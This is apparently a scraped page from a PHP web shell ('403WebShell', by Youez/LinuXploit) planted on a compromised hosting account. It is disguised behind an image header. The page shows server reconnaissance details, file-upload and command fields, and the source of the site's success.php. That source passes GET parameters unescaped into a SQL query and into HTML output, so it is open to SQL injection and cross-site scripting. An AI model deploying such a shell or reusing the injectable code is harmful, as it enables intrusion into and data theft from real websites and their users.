����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 162.0.232.25  /  Your IP : 3.137.177.116
Web Server : LiteSpeed
System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : kwacuqig ( 988)
PHP Version : 8.2.26
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/kwacuqig/malawisounds.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/kwacuqig/malawisounds.com/success.php
<?php
include 'connect.php';
if (isset($_GET['artist'], $_GET['title'])) {
    $artist = $_GET['artist'];
    $title = $_GET['title'];

    $sql = "SELECT `file`,`size`,`artist`,`title`,`image`,`genre`,`id`,`type`,`listened` FROM `tbl_uploads` WHERE `artist`='$artist' AND `title`='$title'";
    if ($query_run = mysqli_query($conn, $sql)) {
        list($song, $size, $artist, $title, $image, $genre, $id, $type) = mysqli_fetch_array($query_run);
        $titleurl = str_replace(' ', '-', $title);
        $artisturl = str_replace(' ', '-', $artist);
    } else {
        die(mysqli_error($conn));
    }
} else {
    die("
    <html>
        <head>
            <title>Song Not Available</title>
            <meta name=\"viewport\" content=\"width=device-width,initial-scale=1.0\">
            <meta charset=\"UTF-8\">
            <link rel=\"shortcut icon\" href=\"Icons/malawisounds.ico\">
        </head>
        <body style=\"background-image:url(./Icons/404.jpg);width:100%;height:100%;background-size:cover;background-position:center center;;background-repeatno-repeat\">
                <h3  style=\"font-size:25px;font-family:arial;color:red;min-height;position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);\"><center>OOPS! <br>SOME SONG PARAMETERS ARE MISSING!</center></h3>
        </body>
    </html>
");
}
?>
<!DOCTYPE html>
<html lang="en" class="no-js">

<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" type="text/css" href="css/load.css">
    <link rel="icon" type="x-icon" href="Icons/malawisounds.ico">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="dashboard/css/bootstrap.min.css">

    <!-- Style -->
    <link rel="stylesheet" href="css/style.css">
    <style type="text/css">
        .success-container .row h3 {
            font-family: gothic;
            text-align: center;
        }

        * {
            font-family: gothic, Arial;
        }
    </style>
    <title><?php echo "$title by $artist upload success"; ?></title>
    <script type="text/javascript" src="js/sweetalert.min.js"></script>
</head>

<body>
    <div class="container-fluid">
        <div class="row d-flex justify-content-center align-items-center success-container">
            <div class="col">
                <div class="row mt-2 mb-1">
                    <div class="col-12">
                        <center><a href="upload-music" class="btn btn-primary">Go Back</a></center>
                    </div>
                </div>
                <div class="row">
                    <div class="col-12">
                        <img src="./images/<?php echo $image; ?>" alt="<?php echo "$artist-title"; ?>">
                        <div class="alert alert-success alert-dismissible fade show">
                            <button type="button" class="close" data-dismiss="alert">&times;</button>
                            <strong>Success!</strong> <?php echo "$title by $artist was successfully uploaded"; ?>
                        </div>
                    </div>
                    <!-- Audio Player -->
                    <div class="col-12 text-center">
                        <audio src="./uploads/<?php echo $song; ?>" controls></audio>
                    </div>
                    <!-- Link Copy -->
                    <div class="col-12">
                        <input type="text" value="https://malawisounds.com/<?php echo "$id-$titleurl-by-$artisturl"; ?>" id="link">
                        <button onclick="cpyLink()">Copy</button>
                        <ul>
                            <li>Click copy to obtain your link for sharing</li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <script>
        function cpyLink() {
            copyText = document.getElementById('link');
            copyText.select();
            document.execCommand("copy");
            swal("COPIED", link.value, "success");
        }
    </script>
    <script src="dashboard/js/jquery-3.3.1.min.js"></script>
    <script src="dashboard/js/bootstrap.min.js"></script>
</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit